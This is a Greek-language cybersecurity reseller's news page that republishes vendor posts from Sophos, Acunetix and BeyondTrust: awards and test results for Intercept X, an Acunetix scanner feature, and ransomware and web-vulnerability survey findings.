ΠΡΟΪΟΝΤΑ

Cyber Security Elements by NSS

Νέα

18

Μάι

H Sophos βρίσκεται στην ευχάριστη θέση να ανακοινώσει ότι για 12η συνεχόμενη φορά ανακηρύχθηκε «Leader» στην έκθεση Magic Quadrant for Endpoint Protection Platforms (EPP) της Gartner.

Στην εταιρεία Sophos είναι βέβαιοι ότι η τοποθέτηση της εταιρείας στο «τεταρτημόριο» των «ηγετών» οφείλεται στο συνδυασμό της προηγμένης προστασίας, της ευρείας ικανότητας ανίχνευσης και ανταπόκρισης endpoint (EDR), των δυνατοτήτων κυνηγιού απειλών και λειτουργιών πληροφορικής που βρίσκονται στο Intercept X.

Εκτός από το αποδεδειγμένο ιστορικό αναχαίτησης και αντιμετώπισης επιθέσεων ransomware και προηγμένων απειλών, οι πρόσφατες βελτιώσεις στις δυνατότητες EDR του Intercept X δίνουν τη δυνατότητα σε εταιρείες και οργανισμούς να χρησιμοποιήσουν ισχυρά SQL queries για να βρουν απαντήσεις σε κρίσιμα ερωτήματα που αφορούν λειτουργίες πληροφορικής και το κυνήγι απειλών. Περιλαμβάνονται έτοιμα (προ-γραμμένα) queries με δυνατότητες πλήρους προσαρμογής στις ιδιαίτερες ανάγκες σας ενώ δεν απουσιάζουν και δυνατότητες δημιουργίας ερωτημάτων από το μηδέν για την υποστήριξη όλων των περιπτώσεων χρήσης.

Η Sophos συνεχίζει να επενδύει τόσο στις δυνατότητες προστασίας όσο και στις δυνατότητες EDR κυκλοφορώντας πολλές εκδόσεις τον τελευταίο χρόνο. Πρόσφατα η εταιρεία ανακοίνωσε το Sophos XDR, το οποίο επεκτείνει την ορατότητα EDR πέρα από τις τερματικές συσκευές και τους διακομιστές.

Διαβάστε την πλήρη έκθεση

Αποτελέσματα ανεξάρτητων δοκιμών αξιολόγησης του Intercept X  από τρίτους

SE Labs

MRG Effitas

PC Magazine

SC Media

CRN 2020 Tech Innovators Awards

Gartner Peer Insights

  • Το Intercept X Advanced με EDR είχε κατά μέσο όρο βαθμολογία 4.8 (από 5.0) τους τελευταίους 12 μήνες στην έκθεση Gartner Peer Insights
  • Το Sophos MTR είχε κατά μέσο όρο βαθμολογία 4.8 (από 5.0) τους τελευταίους 12 μήνες στην έκθεση Gartner Peer Insights

Πηγή: Sophos

13

Μάι

Με την τελευταία ενημέρωση του Acunetix, η εταιρεία εισήγαγε ένα νέο χαρακτηριστικό που ονομάζει «target knowledge base». Κάθε φορά λοιπόν που σαρώνετε έναν στόχο, το Acunetix συλλέγει και αποθηκεύει σχετικές με αυτόν πληροφορίες. Οι πληροφορίες περιλαμβάνουν paths που απαρτίζουν τη δομή της ιστοσελίδας, τη θέση των φορμών και τα inputs τους, παραμέτρους που χρησιμοποιούνται από τη διαδικτυακή εφαρμογή, τυχόν APIs που χρησιμοποιούνται και τις ευπάθειες που έχουν ανιχνευθεί.

Καλύτερη με το πέρασμα του χρόνου

Η ιδέα πίσω από το «target knowledge base» είναι για να είναι το προϊόν σε θέση να επαναχρησιμοποιήσει όσο το δυνατόν περισσότερες από αυτές τις πληροφορίες στις επόμενες σαρώσεις για να ενδυναμώσει τον crawler της Acunetix. Μπορείτε να σκεφτείτε τον crawler ως έναν τυχοδιώκτη που εισέρχεται σε έναν λαβύρινθο και πρέπει να ελέγξει όλες τις διαθέσιμες διαδρομές για να βρει αξιόπιστα τον δρόμο του προς την έξοδο. Δεν θα ήταν περισσότερο αποτελεσματικός ο τυχοδιώκτης στην ολοκλήρωση της αποστολής του αν είχε στη διάθεση του τον πλέον ενημερωμένο χάρτη του λαβυρίνθου; Με παρόμοιο τρόπο λοιπόν και ο crawler (το πρόγραμμα ανίχνευσης) γίνεται περισσότερο διεξοδικός στην δημιουργία της δομής μίας ιστοσελίδας όταν έχει στη διάθεση του την γνωσιακή βάση στόχου.

Με τη γνωσιακή βάση στόχων, ο σαρωτής δεν είναι απαραίτητο να ξεκινήσει κάθε σάρωση από το μηδέν. Αντ’ αυτού, ξεκινάει χρησιμοποιώντας τη λίστα διευθύνσεων URL από τη γνωσιακή βάση. Το παραπάνω μοιάζει σαν να εισάγεται στον σαρωτή ένα αρχείο (import file) που περιέχει μια λίστα με διευθύνσεις URL για τη συμπλήρωση της δομής της ιστοσελίδας πριν ξεκινήσει τη δουλειά του ο crawler.

Μην αφήνετε κανένα σημείο

Κατά τις δοκιμές στον στόχο, το Acunetix ξεκινάει την διερεύνηση του υποβάλλοντας διάφορες τιμές δεδομένων για το φορτίο, διαμορφωμένες με τρόπο που έχει σχεδιαστεί για να εντοπίζει ευπάθειες. Ο τρόπος με τον οποίο ανταποκρίνεται η διαδικτυακή εφαρμογή στα αιτήματα του Acunetix ενδέχεται να επηρεάσει τη διεξοδικότητα κάθε σάρωσης. Ορισμένες σαρώσεις ενδέχεται να εκθέσουν συγκεκριμένες διευθύνσεις URL ενώ άλλες σαρώσεις ενδέχεται να μην το κάνουν ανάλογα τις περιστάσεις.

Με τη γνωσιακή βάση στόχων, κάθε σάρωση που ακολουθεί πηγαίνει παραπέρα από αυτά που ανακαλύπτει ο crawler κατά τη διάρκεια της σάρωσης – χρησιμοποιεί paths και τοποθεσίες, η συλλογή των οποίων πραγματοποιήθηκε κατά τη διάρκεια προηγούμενων σαρώσεων του ίδιου στόχου. Το παραπάνω διασφαλίζει ότι είστε σε θέση να προχωρήσετε στη σάρωση διευθύνσεων URL που δεν μπορείτε να φτάσετε με προβλέψιμο τρόπο ή με συνέπεια χρησιμοποιώντας τη συνήθη λειτουργία ανίχνευσης.

Επιπλέον, πολλοί στόχοι αλλάζουν και εξελίσσονται με την πάροδο του χρόνου καθώς οι προγραμματιστές προσθέτουν νέες δυνατότητες, αλλάζουν δυνατότητες που υφίστανται ή καταργούν λειτουργίες. Αυτό σημαίνει, ότι αν για παράδειγμα, μια λειτουργία που έχει αφαιρεθεί δεν είναι πλέον προσβάσιμη από οποιονδήποτε σύνδεσμο ή ιστοσελίδα εντός του στόχου, μπορεί να βρίσκεται στον web server με τη μορφή ενός ορφανού URL. Χάρη στη γνωσιακή βάση στόχων, το Acunetix μπορεί να σαρώσει ακόμη και αυτές τις ορφανές λειτουργίες.

Αξιόπιστη επαλήθευση ευπάθειας και self-healing

Το Acunetix αποθηκεύει επίσης πληροφορίες σχετικά με όλες τις ευπάθειες που εντοπίστηκαν κατά τις προηγούμενες σαρώσεις του στόχου και χρησιμοποιεί αυτές τις πληροφορίες σε επόμενες σαρώσεις του ίδιου στόχο. Επομένως, όταν θέλετε να προχωρήσετε σε επανέλεγχο για να διαπιστώσετε αν οι ευπάθειες εξακολουθούν να υφίστανται, δεν είναι απαραίτητο για τον crawler να προχωρήσει ξανά στην ανίχνευση τους, επειδή ο σαρωτής έχει γνώση της πιθανής ύπαρξης τους.

Ένα άλλο ωραίο χαρακτηριστικό είναι ότι η γνωσιακή βάση στόχων είναι αυτοθεραπευόμενη. Αν για παράδειγμα αλλάξετε ένα τμήμα της δομής της ιστοσελίδας και πάψουν να υπάρχουν ορισμένες από τις διευθύνσεις URL, ο crawler θα επιχειρήσει αρχικά να προσεγγίσει όλα τα αποθηκευμένα URLs και ακολούθως θα αφαιρέσει τα «ξεπερασμένα» από τη γνωσιακή βάση. Αυτό σημαίνει ότι ακόμα και αν προχωρήσετε στην επανασχεδίαση της διαδικτυακής εφαρμογής και γνωρίζετε ότι η προηγούμενη δομή δεν είναι πλέον έγκυρη λόγω του επανασχεδιασμού, κατά την επόμενη σάρωση θα πραγματοποιηθεί καθαρισμός και επιδιόρθωση των δεδομένων της γνωσιακής βάσης.

Διαμόρφωση γνωσιακής βάσης στόχων

Αν για οποιονδήποτε λόγο επιθυμείτε να εκτελέσετε μία ή περισσότερες σαρώσεις προσωρινά χωρίς να χρησιμοποιήσετε τη γνωσιακή βάση στόχων, μπορείτε να αλλάξετε τις ρυθμίσεις για τον στόχο και να απενεργοποιήσετε τη χρήση της γνωσιακής βάσης για τις νέες σαρώσεις που θα εκτελέσετε. Στη συνέχεια, μπορείτε να ενεργοποιήσετε ξανά τη χρήση της γνωσιακής βάσης για να σαρώσετε την κανονική έκδοση του στόχου.

Μπορείτε επίσης να διαγράψετε οριστικά τα περιεχόμενα της γνωσιακής βάσης και να αρχίσετε να συλλέγετε νέα δεδομένα για τον στόχο. Για να κάνετε κάτι τέτοιο, απλώς επεκτείνετε την ενότητα «Advanced» στη σελίδα «Target Settings» και κάντε κλικ στο κουμπί «Delete knowledge base» στο πάνελ «Knowledge Base».

Πηγή: Acunetix

11

Μάι

Το Intercept X κατέκτησε την 1η θέση βαθμολογούμενο συνολικά με 100% ακρίβεια στις περιπτώσεις της προστασίας για μεγάλες επιχειρήσεις, για μικρομεσαίες επιχειρήσεις και απλούς χρήστες σε τρεις πρόσφατες αξιολογήσεις/ δοκιμές της εταιρείας SE Labs.

Η Sophos δηλώνει με υπερηφάνια ότι το Sophos Intercept X πέτυχε 100% Total Accuracy Rating στην πρόσφατη δοκιμή της SE Labs που αφορούσε λύσεις προστασίας τερματικών συσκευών (endpoint protection) για μεγάλες επιχειρήσεις, για μικρομεσαίες επιχειρήσεις και απλούς χρήστες (Ιαν.-Μαρ. 2021). Επομένως, μπορείτε να νιώθετε άνετα ότι έχετε την υποστήριξη της καλύτερης προστασίας endpoint στον κόσμο είτε προστατεύετε τους υπαλλήλους σας στη δουλειά ή τις οικογένειες τους στο σπίτι.

Ο μοναδικός συνδυασμός της τεχνολογίας anti-ransomware, της τεχνητής νοημοσύνης βαθιάς εκμάθησης, της πρόληψης exploit και της δυναμικής αντιμετώπισης εχθρικών επιθετικών ενεργειών στο Intercept X δημιουργήθηκε για να αποτρέπει το ευρύτερο φάσμα απειλών.

Επιπλέον, το Sophos Intercept X Advanced with EDR ενσωματώνει ισχυρή τεχνολογία ανίχνευσης και ανταπόκρισης σε κυβερνοαπειλές για τερματικές συσκευές (EDR), η οποία επιδεικνύει την κορυφαία βαθμολογία προστασίας του κλάδου. Σχεδιασμένο τόσο για λειτουργίες ασφάλειας πληροφορικής όσο και για κυνήγι απειλών, το Intercept X εντοπίζει και διερευνά την ύποπτη δραστηριότητα αναλύοντας τα δεδομένα με τη βοήθεια της Τεχνητής Νοημοσύνης.

Όσοι επίσης χρειάζονται βοήθεια με τον εντοπισμό και την ανταπόκριση σε απειλές, το Sophos Managed Threat Response (MTR) παρέχει κυνήγι απειλών, ανίχνευση απειλών και δυνατότητες ανταπόκρισης σε απειλές 24 ώρες το 24ώρο, 7 ημέρες την εβδομάδα από μια ομάδα εμπειρογνωμόνων, η οποία παρέχεται ως μία πλήρως διαχειριζόμενη υπηρεσία.

Το Sophos MTR συγχωνεύει την τεχνολογία προστασίας του Intercept X με την εξειδικευμένη ανθρώπινη ανάλυση για βελτιωμένο κυνήγι και ανίχνευση απειλών, βαθύτερη διερεύνηση των ειδοποιήσεων και στοχευμένες ενέργειες για την εξάλειψη των απειλών με ταχύτητα και ακρίβεια. Σε αντίθεση με άλλες υπηρεσίες, η ομάδα Sophos MTR πηγαίνει τα πράγματα ένα βήμα παραπέρα από το να σας ειδοποιεί απλώς για επιθέσεις ή ύποπτες συμπεριφορές και αναλαμβάνει να προχωρήσει σε στοχευμένες ενέργειες εκ μέρους σας για να εξουδετερώσει ακόμη και τις πιο προηγμένες και περίπλοκες απειλές.

Η SE Labs δεν είναι η μόνη ανεξάρτητη εταιρεία που επαινεί το Intercept X. Μια λίστα με άλλα βραβεία του κλάδου θα βρείτε εδώ.

Το #1 στην Προστασία για Μεγάλες Επιχειρήσεις

Το Sophos Intercept X ήταν το μοναδικό προϊόν της συγκριτικής δοκιμής που επέδειξε ποσοστό 100% συνολικά για την ακρίβεια του στην ανίχνευση/ αντιμετώπιση κυβερνοαπειλών κερδίζοντας βαθμολογία AAA για μία ακόμη φορά από την SE Labs. Μπορείτε να δείτε τα αποτελέσματα της συγκριτικής δοκιμής εδώ.

Το #1 στην Προστασία για Μικρομεσαίες Επιχειρήσεις

Στην δοκιμή των λύσεων προστασίας για μικρομεσαίες επιχειρήσεις, το Intercept X έδειξε για ακόμη μία φορά γιατί ήταν ο νικητής στις δοκιμές Small Business Endpoint της SE Labs τις χρονιές 2020 και 2019. Όπως και στο τεστ για τις λύσεις που αφορούν τις μεγάλες επιχειρήσεις, το Intercept X κατέλαβε την πρώτη θέση με ποσοστό 100% συνολικά για την ακρίβεια του στην ανίχνευση/ αντιμετώπιση κυβερνοαπειλών. Μπορείτε να δείτε τα πλήρη αποτελέσματα της δοκιμής για τις λύσεις που απευθύνονται σε μικρομεσαίες επιχειρήσεις (SMB) εδώ.

Το #1 στην Προστασία για το Σπίτι

Το ίδιο κακόβουλο λογισμικό που επιτίθεται σε εταιρείες που βρίσκονται στη λίστα Fortune 500 επιτίθεται και σε απλούς χρήστες και καταναλωτές. Το Sophos Home χρησιμοποιεί τα ίδια βραβευμένα χαρακτηριστικά ασφαλείας που διατηρούν ασφαλείς και τις μεγαλύτερες εταιρείες. Μπορείτε να δείτε τα αποτελέσματα της δοκιμής των λύσεων που απευθύνονται σε απλούς χρήστες εδώ.

Δοκιμάστε τα Intercept X και Sophos Home δωρεάν

Δεν θα μπορούσε να είναι απλούστερη η δοκιμή των ισχυρών χαρακτηριστικών του Intercept X. Προχωρήστε σε εγγραφή από σήμερα κιόλας για να λάβετε μία 30 ημερών δοκιμαστική έκδοση της βραβευμένης και με δυνατότητες EDR έκδοσης του Intercept X ή διαφορετικά ενεργοποιήστε ένα instant online demo της λύσης της Sophos.

Αν από την άλλη αναζητάτε την καλύτερη λύση προστασίας για τους οικιακούς υπολογιστές και τις συσκευές σας, κατεβάστε μία δωρεάν δοκιμαστική έκδοση του Sophos Home.

Πηγή: Sophos

6

Μάι

Στον απόηχο των αποκαλύψεων για μεγάλες ευπάθειες σε δημοφιλή συστήματα, οι τελευταίες έρευνες αποκαλύπτουν μία ζοφερή εικόνα για τις επιθέσεις ransomware, οι έχουν αυξηθεί έως και κατά 150% φέτος και δεν φαίνεται να υπάρχουν σημάδια υποχώρησης. Οι νέες επιθέσεις «χτυπούν» μεγάλες επιχειρήσεις, την τοπική αυτοδιοίκηση ή εκπαιδευτικά ιδρύματα και σχολεία. Οι επαγγελματίες από τον χώρο τηςbeyond  ασφάλειας πληροφορικής εκφράζουν απαισιοδοξία για τις εξελίξεις με ορισμένους μάλιστα να βλέπουν τις επιθέσεις να πραγματοποιούνται όλο και με ταχύτερο ρυθμό.

Ως βιομηχανία, αδυνατούμε να διατηρήσουμε την επαφή μας και να συμβαδίσουμε με τους επιτιθέμενους, λένε από την BeyondTrust. Αν και δημοσιοποιούνται ευπάθειες, με τους οργανισμούς και τις επιχειρήσεις να γνωρίζουν το τίμημα σε περίπτωση που αποτύχουν να τις επιδιορθώσουν εφαρμόζοντας τα κατάλληλα patches, οι τελευταίες ευπάθειες είναι εξαιρετικά κρίσιμης σημασίας και απαιτούν άμεσο -για να αποφευχθούν οι χειρότερες συνέπειες για τη λειτουργία των επιχειρήσεων- patching για να αποφύγουν να αποτελέσουν στόχο.

Σήμερα, το ransomware-as-a-service φαίνεται να γνωρίζει άνθιση και τα ransomware kits μπορούν εύκολα να αγοραστούν online. Τέτοια αναπτυσσόμενα επιχειρηματικά μοντέλα ransomware και αγορές καθιστούν απλή υπόθεση την ανάπτυξη και την αγορά ransomware. Και είναι γνωστό, ότι πέρα από την αξιοποίηση ευπαθειών για την άμεση «έκχυση» κακόβουλου λογισμικού (malware), ήταν ήδη εύκολο για το ransomware να βρει τον δρόμο του προς ένα εταιρικό περιβάλλον μέσω μηνυμάτων ηλεκτρονικού ταχυδρομείου ή μέσω άλλων τύπων επιθέσεων.

Πολλοί σύγχρονοι παράγοντες απειλής κοιτάζουν να πετύχουν κάτι διαφορετικό σε σχέση με το παρελθόν. Οι στόχοι και οι τύποι επίθεσης δεν είναι αυτοί που βλέπαμε πριν από μερικά χρόνια, όταν κρυπτογραφούσαν μεμονωμένους υπολογιστές χρηστών για να «βγάζουν» μερικές εκατοντάδες δολάρια ανά θύμα. Αν και τα ποσοστά πληρωμών παρέμειναν στα ίδια επίπεδα, με περίπου τα μισά θύματα να πληρώνουν τα λύτρα, τα ποσά που ζητούνται τώρα και οι στόχοι είναι πολύ μεγαλύτεροι, σε σημείο να γίνονται διαπραγματεύσεις για δεκάδες εκατομμύρια δολάρια σε λύτρα. Μάλιστα, τα ποσά για λύτρα από επιθέσεις ransomware σχεδόν τριπλασιάστηκαν το 2020 σε σχέση με το 2021.

Οι επιτιθέμενοι γνωρίζουν ότι έχουν το πάνω χέρι και επιτίθενται ακόμα και σε ασφαλισμένους οργανισμούς προσπαθώντας να αποσπάσουν πληρωμές για λύτρα εντός της ασφαλιστικής κάλυψης. Αν και νέα, αυτή η νέα προσέγγιση φαίνεται να θέτει τους οργανισμούς -ακόμη και μεγάλους, ώριμους, σταθερούς και ασφαλισμένους- σε δεινή θέση.

Το ransomware μπορεί να εισχωρήσει στα περιβάλλοντα μας μέσω πολλών διαφορετικών φορέων επίθεσης, οπότε δεν υπάρχει μία τεχνολογία ή λύση που να μπορεί να προσφέρει μία ολοκληρωμένη προστασία ενάντια στο ransomware. Οι αρχές επίσης δεν εντοπίζουν, διώκουν και καταδικάζουν αρκετούς επιτιθέμενους για να αποθαρρύνουν ορισμένους και να αποτρέψουν μελλοντικές επιχειρήσεις ransomware. Και οι οργανισμοί με τα κατάλληλα προγράμματα δημιουργίας αντιγράφων ασφαλείας εξακολουθούν να μην ανακάμπτουν με αρκετά γρήγορο ρυθμό για να αντισταθμίσουν τον αντίκτυπο των επιθέσεων ransomware.

Χρειάζεται λοιπόν να σκεφτούμε διαφορετικά την συγκεκριμένη απειλή και πως να προετοιμαστούμε και να την αντιμετωπίσουμε. Πρέπει έχουμε γνώση και κατανόηση των δικών μας συστημάτων, να έχουμε ένα συγκεκριμένο σχέδιο ανταπόκρισης σε συμβάντα ransomware και να είμαστε επιπλέον δημιουργικοί στο σχεδιασμό ενός ισχυρού και πολυεπίπεδου συστήματος δημιουργίας αντιγράφων ασφαλείας.

Επιπλέον, οι οργανισμοί θα πρέπει να λάβουν υπόψη τους ότι θα πέσουν θύματα ransomware – όχι αν, αλλά το πότε. Θα πρέπει όλοι να έχουμε έναν «kill switch» για να απενεργοποιήσουμε όλα τα συστήματα ώστε να περιορίσουμε την εξάπλωση του όταν συμβεί. Διότι σήμερα, δεν περιορίζουμε και σίγουρα δεν πετυχαίνουμε αυτά που θα έπρεπε.

Για περισσότερες πληροφορίες για το ζήτημα του ransomware, ρίξτε μια ματιά στο on-demand webinar: The Brutal Wave of Ransomware & How Attacks are Evolving.

Πηγή: BeyondTrust

4

Μάι

Η έκθεση «The State of Ransomware 2021» παρέχει νέες πληροφορίες για τη συχνότητα των επιθέσεων ransomware και τις συνέπειες τους.

Βασισμένη σε ευρήματα που προέκυψαν από μία έρευνα στην οποία έλαβαν μέρος 5.400 υπεύθυνοι τμημάτων πληροφορικής σε μεσαίου μεγέθους οργανισμούς σε 30 χώρες στον κόσμο, η έκθεση αποκαλύπτει ότι το 37% των οργανισμών επλήγησαν από τουλάχιστον μία επίθεση ransomware τους τελευταίους 12 μήνες – ποσοστό που είναι μειωμένο κατά 51% σε σχέση με το 2020.

Επιπλέον, λιγότεροι οργανισμοί «έζησαν» τη δυσάρεστη εμπειρία της κρυπτογράφησης των δεδομένων τους από μία μεγάλη επίθεση – με το ποσοστό φέτος να εμφανίζεται μειωμένο κατά 19% σε σχέση με πέρυσι (στο 54% φέτος από το 73% πέρυσι). Μέχρι στιγμής, όλα καλά.

Παρόλα αυτά, αν και ο αριθμός των οργανισμών που επλήγησαν από επιθέσεις ransomware μειώθηκε σε σχέση με πέρυσι, ο οικονομικός αντίκτυπος μίας τέτοιας επίθεσης φαίνεται να έχει υπερδιπλασιαστεί, από τα $761 χιλιάδες περίπου πέρυσι στα $1,85 εκατομμύρια φέτος. Η αύξηση ενδέχεται να οφείλεται κατά μέρος σε περισσότερο προηγμένες και περίπλοκες, στοχευμένες επιθέσεις, οι οποίες μπορεί να κατέστησαν δύσκολη ή ακατόρθωτη την ανάκτηση των δεδομένων.

Οι πληρωμές δεν αποδίδουν

Ο αριθμός των οργανισμών που πληρώνουν λύτρα για την ανάκτηση των δεδομένων τους αυξήθηκε τον τελευταίο χρόνο κατά 6%, από το 26% των οργανισμών των οποίων τα δεδομένα κρυπτογραφήθηκαν το 2020 στο 32% το 2021.

Παρόλα αυτά, αυτό που δεν αναφέρεται στις απαιτήσεις των επιτιθέμενων είναι ότι η πιθανότητα ανάκτησης ή λήψης των δεδομένων σας μετά την πληρωμή των λύτρων είναι πολύ μικρή: λιγότεροι από ένας στους δέκα (8%) επέστρεψε άθικτα όλα τα κρυπτογραφημένα αρχεία των οργανισμών που έπεσαν θύματα.

Πιο συγκεκριμένα, κατά μέσο όρο οι οργανισμοί που πλήρωσαν λύτρα είδαν να «επιστρέφει άθικτο» μόνο το 65% των δεδομένων τους ενώ στο 29% των περιπτώσεων επέστρεψαν μόνο τα μισά από τα δεδομένα. Όταν έχετε να κάνετε με μία επίθεση ransomware, η πληρωμή των λύτρων δεν είναι μία λύση που αποδίδει.

Η έρευνα αποκάλυψε επίσης ότι οι εκβιασμοί χωρίς κρυπτογράφηση αυξήθηκαν. Το 7% των ερωτηθέντων που έκαναν γνωστό ότι οι οργανισμοί στους οποίους εργάζονται επλήγησαν από ransomware δήλωσε ότι παρόλο που τα δεδομένα δεν είχαν κρυπτογραφηθεί, κρατήθηκαν ούτως ή άλλως για λύτρα, ενδεχομένως επειδή οι επιτιθέμενοι είχαν καταφέρει ήδη να αποσπάσουν/ κλέψουν τις πληροφορίες που ήθελαν. Πρόκειται για αύξηση 4%, καθώς το ποσοστό αυτό ήταν μόλις 3% το 2020.

Νικητές και ηττημένοι

Η έκθεση παρέχει επίσης πληροφορίες για το πως επηρεάστηκαν κλάδοι ή ακόμα και χώρες από το ransomware τον τελευταίο χρόνο, όπως για παράδειγμα:

  • Η Ινδία ήταν η χώρα που ανέφερε τις περισσότερες επιθέσεις ransomware με το 68% των ερωτηθέντων να δηλώνουν ότι επλήγησαν πέρυσι. Αντίθετα, η Πολωνία (13%) και η Ιαπωνία (15%) ανέφεραν τις λιγότερες επιθέσεις.
  • Αν και γείτονες χώρες, οι Αυστρία και Τσεχία αποτελούν τα δύο άκρα όσον αφορά το κόστος ανάκτησης από το ransomware: οι ερωτηθέντες από την Αυστρία ανέφεραν το υψηλότερο κόστος ανάκτησης από όλους τους εκπροσώπους των χωρών που ερωτήθηκαν, ενώ οι ερωτηθέντες από την Τσεχία ανέφεραν το χαμηλότερο.
  • Οι κλάδοι του λιανικού εμπορίου και της εκπαίδευσης (και οι δύο με ποσοστό 44%) ήταν οι τομείς που ανέφεραν τις περισσότερες επιθέσεις.
  • Η τοπική αυτοδιοίκηση ήταν ο τομέας που ήταν περισσότερο πιθανό να δει τα δεδομένα του να κρυπτογραφούνται σε μια επίθεση ransomware (69%).

Διαβάστε την πλήρη έκθεση

Διαβάστε την έκθεση State of Ransomware 2021 για να έχετε εικόνα για το σύνολο των ευρημάτων. Περιλαμβάνει συμβουλές βέλτιστων πρακτικών από την Sophos που θα σας βοηθήσουν να παραμείνετε ασφαλείς από το ransomware.

Πηγή: Sophos

27

Απρ

Κάθε χρόνο, η Acunetix προσφέρει μια ανάλυση των πιο συχνών ευπαθειών στη διαδικτυακή ασφάλεια και στην ασφάλεια της δικτυακής περιμέτρου. Η ετήσια αναφορά για τις ευπάθειες διαδικτυακών εφαρμογών (που τώρα αποτελεί μέρος του δείκτη Invicti AppSec) βασίζεται σε πραγματικά δεδομένα που λαμβάνονται από το Acunetix Online. Η εταιρεία επιλέγει με τυχαίο τρόπο ιστοσελίδες και διαδικτυακές εφαρμογές που σαρώνονται χρησιμοποιώντας το λογισμικό της, τις ανωνυμοποιεί και πραγματοποιεί σχετική στατιστική ανάλυση. Παρακάτω παρουσιάζονται τα ευρήματα της στην κυβερνοασφάλεια για το έτος.

Η κατάσταση στην ασφάλεια διαδικτυακών εφαρμογών

Η έκθεση της εταιρείας για το 2021 είναι, δυστυχώς, αρκετά απαισιόδοξη. Η τάση βραδείαw βελτίωσης από τα προηγούμενα χρόνια φαίνεται να έχει αντιστραφεί. Αρκετές ευπάθειες υψηλής και μεσαίας σοβαρότητας συναντώνται πλέον πιο συχνά το 2021 από ότι το 2020, συμπεριλαμβανομένων και ορισμένων σοβαρών κινδύνων για την ασφάλεια που μπορεί να οδηγήσουν στην απώλεια ευαίσθητων πληροφοριών.

Η εταιρεία πιστεύει ότι αυτή η αντιστροφή έχει προκληθεί από την πανδημία COVID-19. Η πανδημία έχει οδηγήσει τις περισσότερες εταιρείες να υϊοθετήσουν μοντέλα απομακρυσμένης εργασίας και ως εκ τούτου πολλοί ηγέτες στον κλάδο της κυβερνοασφαλείας αποφάσισαν να επικεντρωθούν στην ασφάλεια των τερματικών συσκευών, στην ασφάλεια του λειτουργικού συστήματος και σε προσπάθειες ενάντια στο κακόβουλο λογισμικό, για να καταπολεμήσουν το ηλεκτρονικό ψάρεμα, τις κακόβουλες ιστοσελίδες και τον κακόβουλο κώδικα. Επομένως, δεν επενδύθηκαν αρκετοί πόροι για τη βελτίωση της διαδικτυακής ασφάλειας. Αντί λοιπόν να γίνουν επενδύσεις σε διεξοδικές διαδικασίες, οι επιχειρήσεις επέλεξαν τις γρήγορες και ατελείς λύσεις, που συχνά βασίζονται σε μη σωστά διαμορφωμένα τείχη προστασίας διαδικτυακών εφαρμογών (WAF).

Σύμφωνα με την Acunetix, τέτοιες αποφάσεις θα μπορούσαν να έχουν σοβαρές συνέπειες στο μέλλον. Ως αποτέλεσμα της μετάβασης στην τηλεργασία, η σημασία των διαδικτυακών εφαρμογών αυξήθηκε. Για να ενισχυθεί η παραγωγικότητα και η αποτελεσματικότητα της τηλεργασίας, δεν ήταν λίγες οι επιχειρήσεις που κατέστησαν διαθέσιμες τις διαδικασίες τους μέσω προγραμμάτων περιήγησης ιστού, χρησιμοποιώντας διαδικτυακές εφαρμογές και APIs. Το παραπάνω ωστόσο κατέστησε δυνατή την πρόσβασης σε εταιρικά δεδομένα μέσω ιστοσελίδων για ορισμένους επιτιθέμενους, κάτι που με τη σειρά του θα μπορούσε να οδηγήσει σε σοβαρή παραβίαση δεδομένων.

Στη πρόσφατη μελέτη της Forrester Research, The State of Application Security 2021, τα SQL injection, cross-site scripting και remote file inclusion αποτέλεσαν τις πλέον κοινότυπες μεθόδους επίθεσης που αναφέρθηκαν. Στη μελέτη έλαβαν μέρος 480 υπεύθυνοι λήψης αποφάσεων σε παγκόσμιο επίπεδο με αρμοδιότητες σε δίκτυα, κέντρα δεδομένων, στην ασφάλεια εφαρμογών ή στην επιχειρησιακή ασφάλεια και οι οποίοι βρέθηκαν αντιμέτωποι με μία εξωτερική επίθεση πέρυσι (2020).

Η κρίση των προγραμματιστών

Με τη μετάβαση στην τηλεργασία, η ανάπτυξη διαδικτυακού λογισμικού αντιμετωπίζει εξίσου πολλά προβλήματα, και όχι μόνο την έλλειψη πόρων. Ακόμη και πριν από την εποχή της τηλεργασίας, οι προγραμματιστές συχνά δυσκολεύονταν να γράψουν ασφαλή κώδικα, έκαναν κοινότυπα λάθη λειτουργικότητας, παρέλειπαν την επικύρωση, εμπιστεύονταν δεδομένα εισαγωγής χρηστών από μη αξιόπιστες πηγές, διαβίβαζαν μη αξιόπιστα δεδομένα απευθείας σε ερωτήματα SQL, χρησιμοποιούσαν ανασφαλή αναγνωριστικά περιόδου σύνδεσης χρήστη και μηχανισμούς διαχείρισης συνεδριών κ.ά.

Τα νέα απομακρυσμένα περιβάλλοντα εργασίας καθιστούν ακόμη πιο δύσκολο για τους προγραμματιστές να διατηρήσουν την ασφάλεια του κώδικα εφαρμογής λόγω των προκλήσεων σε επίπεδο επικοινωνίας. Οι προγραμματιστές δεν διαθέτουν επίσης τα εργαλεία και την απαραίτητη εκπαίδευση για να βελτιώσουν τις δεξιότητές τους σχετικά με την ασφάλεια στην περίπτωση που το κέντρο της προσοχής (όσον αφορά την ασφάλεια) μετατοπιστεί μακριά από λύσεις ασφάλειας διαδικτυακών εφαρμογών. Αν ωστόσο είχαν πρόσβαση σε επαγγελματικές λύσεις ασφαλείας διαδικτυακών εφαρμογών, θα λάμβαναν πληροφορίες όχι μόνο για την ύπαρξη ζητημάτων, αλλά και οδηγούς που θα τους έδειχναν πως να αποφεύγουν τέτοια σφάλματα στο μέλλον. Χωρίς τέτοια εργαλεία, οι προγραμματιστές απλώς θα δημιουργούν όλο και περισσότερες ευπάθειες.

Οι ευπάθειες με μια ματιά

Η έκθεση της Acunetix επικεντρώνεται σε κοινές ευπάθειες και εσφαλμένες διαμορφώσεις ασφαλείας – είναι οι ίδιες που επίσης μπορείτε να βρείτε στη λίστα Open Web Application Security Project – OWASP Top 10. Η Acunetix εντόπισε λιγότερα σφάλματα/ ελαττώματα SQL Injection και ζητήματα διάσχισης καταλόγου ή διάσχισης διαδρομής (path traversal) ωστόσο πολλά άλλα σοβαρά ζητήματα ήταν το ίδιο ή περισσότερο κοινά σε σχέση με το προηγούμενο έτος. Σε αυτά περιλαμβάνονται η απομακρυσμένη εκτέλεση κώδικα (έγχυση κώδικα), ζητήματα cross-site scripting (XSS), ευάλωτες βιβλιοθήκες JavaScript, ευπάθειες WordPress, πλαστογράφηση αιτημάτων από πλευράς διακομιστή (SSRF), επιθέσεις έγχυσης κεφαλίδας κ.ά.

